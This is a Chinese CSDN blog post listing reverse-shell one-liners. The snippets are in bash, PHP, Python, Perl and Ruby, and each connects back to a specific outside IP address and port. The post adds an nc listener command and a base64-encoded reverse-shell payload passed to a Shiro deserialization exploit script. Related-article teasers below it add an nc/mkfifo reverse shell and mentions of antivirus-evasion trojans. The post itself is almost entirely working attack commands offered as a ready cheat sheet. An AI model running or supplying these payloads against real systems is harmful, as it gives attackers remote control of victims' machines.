反弹shell语句

最新推荐文章于 2024-04-23 21:45:00 发布
最新推荐文章于 2024-04-23 21:45:00 发布
阅读量567 收藏
点赞数
分类专栏: 攻防技术 文章标签: shell linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u012482741/article/details/105068543
版权 
bash -i >& /dev/tcp/10.0.10.124/23008 0>&1

php -r '$sock=fsockopen("150.158.104.227",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("150.158.104.227",9997));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"150.158.104.227:9996");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("150.158.104.227","9996");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

exec 5<>/dev/tcp/150.158.104.227/9996

php- 'exec("/bin/bash -i >& /dev/tcp/150.158.104.227/9994")'
另外一边用nc去监听端口:`nc -lvvp 23008`

如果要想制作反弹shell的payload,有时需要将其转换成base64编码,然后执行exp,例如:

python2 shiro.py http://10.0.10.179:8080/ "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjEwLjEyNC8yMzAxMCAwPiYx}|{base64,-d}|{bash,-i}"
qwerpuzx
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php反弹shell实现代码
10-30
遇到一个BT的网站,上传php文件成功之后,每访问一次,文件名就会随机改变一次,并且你访问当前文件如果点其他操作项,文件仍然会改名。
反弹shell的方法总结(base64绕过等等)
weixin_50464560的博客
04-01 8253
前言 什么是反弹shell(reverse shell)? 就是控制端监听某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么需要反弹shell反弹shell通常用于被控端因防火墙受限、权限不足、端口被占用等情形。在渗透过程中,往往因为端口限制而无法直连目标机器,此时需要通过反弹shell来获取一个交互式shell,以便继续深入。以下详细介绍Win
C/C++ 匿名管道反弹CMDShell
CSDN
06-11 7928
该段代码是一个用于Windows平台的反向Shell程序,它通过在被控制端和控制端之间建立网络连接,实现远程控制和命令执行。它在被控制端创建管道来重定向控制台命令输出,并将命令执行结果发送回控制端。控制端可以向被控制端发送命令,被控制端接收并执行这些命令,并将执行结果返回给控制端。一旦连接成功,程序可以接收本地输入的命令,并在远程主机上执行这些命令,并将命令的输出返回到本地主机。然后,程序通过管道将命令输出发送回本地,并持续监听新的命令输入。
网络安全-反弹shell详解(攻击,检测与防御)
最新发布
2401_84466336的博客
04-23 2263
1.1 什么是 ShellShell 在计算机系统中指的是一个用户界面,用于访问操作系统的服务。在网络安全中,攻击者常利用 Shell 来控制受害者的系统。1.2 反弹 Shell 的工作原理反弹 Shell 的基本原理是:攻击者在其自己的机器上设置监听端口,然后诱使受害者的机器执行一个反向连接的 Shell 命令,连接回攻击者的机器。这样,攻击者就能通过这个反向连接执行命令,控制受害者的计算机。
Linux反弹Shell总结
qq_45600801的博客
01-06 4236
反弹姿势 1、NC正向反弹 靶机: nc -lvvp 靶机端口 -e /bin/sh 攻击机: nc 靶机ip 靶机端口 2、NC反向反弹 (1)、可使用-e参数: 靶机: nc x.x.x.x 8888 -e /bin/bash 攻击机: nc -lvvp 8888 (2)、NC,无-e参数反弹shell 有些版本的NC可能不支持-e选项,不能使用-e,则: 方法一: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc
linux反弹shell方法
weixin_53747497的博客
07-12 1888
被控端主动发起连接请求去连接控制端,通常被控端由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收发送过来的数据包。被控端攻击端参数解释bash -i : 打开一个交互式的bash shell/dev/tcp/IP/PORT : /dev/tcp/是Linux中的一个特殊设备文件(Linux一切皆文件),实际这个文件是不存在的,它只是 bash 实现的用来实现网络请求的一个接口。0>&1 : 将输入重定向到标准输出,为了确保命令执行后的输入被正确的传回攻击机。
bash反弹shell编码
热门推荐
mingyqf的博客
02-15 1万+
base64 编码 用bash反弹shell的时候,由于Runtime.getRuntime().exec()中不能使用重定向和管道符符号,这里需要对其进行Base64编码 点我在线编码: https://www.jackson-t.ca/runtime-exec-payloads.html
反弹shell小工具源码
10-12
依赖PHP环境。修改IP、端口,自动生成命令
PHP脚本反弹SHELL
10-20
此脚本可以反弹SHELL到指定地址,得到交互交shell
不一样的视角剖析Linux 反弹shell水印版.pdf
08-02
本文的标题是"不一样的视角"剖析linux反弹shell,,和业界普遍的视角是不同的,我把它划分更细了。为啥这么做呢?说一下写这篇文章的初衷,一般反弹shell咱们根 据是否是常驻shel划分为交互式与非交互式两种。我个人...
shell中的循环语句
01-20
FOR循环 for 变量 in 列表;...case语句:选择结构 case SWITCH in value1) statement1 ... ;; value2) statement2 ... ;; *) statement3 ... ;; esac 若switch=value1则执行statement1 若switch=value
vulhub——shiro反序列化getshell漏洞复现
W小哥
11-24 5795
一、漏洞概述 Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。 Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。 二、环境搭建 三、漏洞复现 访问目标网站,使用admin:vulhub进行登录 输入用户名、密码进行登录,开启burpsu
Shiro反弹shell和权限绕过含工具包
02-18 958
【CVE-2019-12422】使用python脚本判断是否存在shiro漏洞,反弹shell漏洞利用,【CVE-2020-1957】Shiro权限绕过漏洞。
反弹shell命令速查
qq_56414082的博客
11-29 229
Nishang是一个基于PowerShell的攻击框架,整合了一些PowerShell攻击脚本和有效载荷,可反弹TCP/ UDP/ HTTP/HTTPS/ ICMP等类型shell。项目地址:https://github.com/besimorhino/powercat。项目地址:https://github.com/samratashok/nishang。
解决反弹shell方向键编码错误问题(小技巧)
干铮的博客
01-29 807
1.接收一个反弹shell 并设置为交互式shell nc -lvnp 7777 python -c "import pty;pty.spawn('/bin/bash')" 2.更改编码格式为rwa 先ctrl+z暂停进程 输入命令 ctrl + z 暂停进程 stty -echo raw 改编码格式 fg 切换回原来进程 ...
C/C++编写的反向SHELL
hambaga的博客
04-08 1988
转载来源: https://www.nulled.to/topic/87972-custom-windows-reverse-shell-backdoor-written-in-c/ http://sh3llc0d3r.com/windows-reverse-shell-shellcode-i/ 下面是我根据原文的修改,将命令行指定ip端口改为写死。将原文多字节编码改为Unicode编码。 ...
学习记录:内网穿透+ShellCode+C++语言二次编译 免杀绕过火绒 渗透Win10提取密码
qq_60709081的博客
06-24 1468
攻击机:Kali (虚拟机)靶机: Windows 10 22H2 版本 10.0.19045(物理机)工具:MSF,VS,花生壳通过C++二次编译制作免杀木马,绕过火绒检测,实现对靶机的控制,windows本地提权,获取并破解用户密码。今天又进步了一点点,之后打算去打基础了,一步一步来。但毕竟做任何事都要有些动力的,做一个ScriptsKids反倒可以增加自己的兴趣和动力呢。🎉✨免责声明:本文仅作学习、深研而用,若有犯罪行为,一切后果自负,与本文作者无关。
入侵检测——如何实现反弹shell检测?
qq_42009262的博客
03-24 2468
如何实现反弹shell检测?
CVE初探之CVE-2019-6250反弹Shell
蚁景网安学院
12-06 480
概述ZMQ(Zero Message Queue)是一种基于消息队列得多线程网络库,C++编写,可以使得Socket编程更加简单高效。该编号为CVE-2019-6250的远程执行漏洞,主要出现在ZMQ的核心引擎libzmq(4.2.x以及4.3.1之后的4.3.x)定义的ZMTP v2.0协议中。这一漏洞已经有很多师傅都已经分析并复现过了,但在环境搭建和最后的利用都所少有一些不完整,为了更好的学习...
反弹shell无法反弹
08-13
关于您提到的反弹shell无法成功的问题,可能有几个原因导致: 1. 防火墙或安全策略:目标主机可能配置了防火墙或其他安全策略,阻止了反弹shell连接。您可以尝试绕过这些安全策略,例如修改反弹shell的目标端口或...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值